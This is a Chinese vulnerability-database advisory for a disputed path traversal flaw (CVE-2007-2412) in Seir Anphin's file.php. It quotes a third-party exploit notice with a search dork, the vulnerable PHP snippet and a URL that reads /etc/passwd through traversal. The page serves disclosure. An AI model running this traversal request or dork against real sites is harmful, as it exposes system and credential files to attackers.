Seir Anphin 'file.php' 远程文件破解漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190754 漏洞类型 路径遍历
发布时间 2007-05-01 更新时间 2007-05-08
CVE编号 CVE-2007-2412 CNNVD-ID CNNVD-200705-005
漏洞平台 N/A CVSS评分 7.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2007050005
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-005
|漏洞详情
SeirAnphin的modules/file.php中存在目录穿越漏洞。远程攻击者可以借助a[filepath]参数中的..,获得敏感信息。注意:此漏洞存在第三方争议.
|漏洞EXP
------------------------------------------------------------------------
----------
AYYILDIZ.ORG PreSents...

Script: Seir Anphin
Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1
Dork:"Powered by Seir Anphin"

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:   */Siz Yokken AYYILDIZ Vardi.*/
------------------------------------------------------------------------
-----------
Bug:
		exit();
		header("Content-Disposition: attachment; filename="$filename"");
		header('Content-Length: ' . filesize($a['filepath']));
		readfile($a['filepath']);
		exit();

------------------------------------------------------------------------
-----------

Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd

------------------------------------------------------------------------
-----------

Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke
Special Tnx: AYYILDIZ.ORG
|参考资料

来源:XF
名称:seiranphin-file-directory-traversal(33962)
链接:http://xforce.iss.net/xforce/xfdb/33962
来源:BUGTRAQ
名称:20070428SeirAnphin(file.phpa[filepath])RemoteFileDisclosureVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/467103/100/0/threaded
来源:VIM
名称:20070429false:SeirAnphin(file.phpa[filepath])RemoteFileDisclosureVulnerability
链接:http://www.attrition.org/pipermail/vim/2007-April/001567.html
来源:SREASON
名称:2651
链接:http://securityreason.com/securityalert/2651